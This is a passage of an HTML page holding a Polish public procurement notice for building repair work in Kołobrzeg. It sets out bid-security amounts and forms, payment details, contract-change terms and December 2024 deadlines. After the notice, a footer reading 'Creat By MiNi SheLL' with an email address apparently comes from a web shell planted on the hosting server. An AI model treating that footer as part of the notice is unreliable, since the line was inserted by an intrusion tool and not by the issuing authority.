że<br/>nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania. Do<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy<br/>P.z.p. mających siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej<br/>Polskiej stosuje się postanowienia pkt 6 i następne.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Część nr: 1<br/>Wartość: 10 000,00 PLN<br/>Część nr: 2<br/>Wartość: 5 000,00 PLN <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego<br/>jest zobowiązany - przed upływem terminu składania ofert - wnieść wadium w<br/>wysokości :<br/>CZĘŚĆ 1 – robot remontowo-budowlane w branży ogólnobudowlanej i sanitarnej –<br/>10 000,00 zł (słownie: dziesięć tysięcy złotych 00/100)<br/>CZĘŚĆ 2 – robot remontowo-budowlane w branży elektrycznej 5 000,00 zł (słownie:<br/>pięć tysięcy złotych 00/100)<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie<br/>do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w<br/>art. 98 ust. 1 pkt 2 i 3 oraz ust. 2. ustawy P.z.p.<br/>3. Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku<br/>następujących formach:<br/>1. pieniądzu;<br/>2. gwarancjach bankowych;<br/>3. gwarancjach ubezpieczeniowych;<br/>4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5<br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji<br/>Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299 z późn. zm.).<br/>4. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy<br/>wskazany przez zamawiającego.<br/>5. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.<br/>6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w<br/>pkt 3 ppkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub<br/>poręczenia, w postaci elektronicznej. Dokument ten powinien zostać podpisany<br/>kwalifikowanym podpisem elektronicznym przez gwaranta.<br/>7. Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto:PKO BP S.A.Oddział Kołobrzeg o numerze 98 1020 2791 0000 7102 0331 3079 z dopiskiem<br/>„Wadium w postępowaniu Nr : DOI/03/11/2024 REMONTY BUDYNKI GMK&#34;. Za<br/>skuteczne wniesienie wadium w pieniądzu zamawiający uzna wadium, które przed<br/>upływem terminu składania ofert znajduje się na koncie zamawiającego.<br/>8. Dokument wadialny złożony w postaci elektronicznej nie może zawierać postanowień<br/>uzależniających jego dalsze obowiązywanie od zwrotu oryginału dokumentu<br/>wadialnego do jego wystawcy. Z treści gwarancji/poręczenia winno wynikać<br/>bezwarunkowe, na każde żądanie zgłoszone przez zamawiającego w terminie<br/>związania ofertą, zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty<br/>wadium w sytuacjach określonych w ustawie P.z.p.<br/>9. Wadium wniesione w formie gwarancji (bankowej czy ubezpieczeniowej) musi mieć<br/>taką samą płynność jak wadium wniesione w pieniądzu – dochodzenie roszczenia z<br/>tytułu wadium wniesionego w tej formie nie może być utrudnione.<br/>10. Oferta wykonawcy, który nie wniesie wadium, wniesie wadium w sposób<br/>nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust.<br/>2 pkt 3 ustawy P.z.p. zostanie odrzucona zgodnie z art. 226 ust. 1 pkt 14) ustawy<br/>P.z.p.. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy<br/>P.z.p<br/>11. Wadium złożone w formie gwarancji lub poręczenia powinno zawierać dane<br/>gwaranta, na które Zamawiający winien złożyć gwarantowi lub poręczycielowi<br/>oświadczenie o zwolnieniu wadium. Sugeruje się podanie adresu e-mail lub ePUAP. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Część II SWZ stanowi projekt umowy, która zostanie zawarta z wykonawcą,<br/>którego oferta zostanie uznana za najkorzystniejszą.<br/>2. Ewentualne zmiany dokonane przez wykonawcę we wzorze umowy nie będą przez<br/>zamawiającego uwzględnione.<br/>3. Wymagania dotyczące umowy o podwykonawstwo, których niespełnienie<br/>spowoduje zgłoszenie przez zamawiającego odpowiednio zastrzeżeń lub<br/>sprzeciwu, zawarte są w projekcie umowy stanowiącej załącznik do SWZ.<br/>4. Zamawiający nie przewiduje możliwości udzielania zaliczek.<br/>5. Zamawiający przewiduje zmiany umowy. Szczegółowy zakres zmian znajduje się w<br/>projekcie umowy w §16 i §17. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-24 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://kolobrzeskietbs.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-24 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com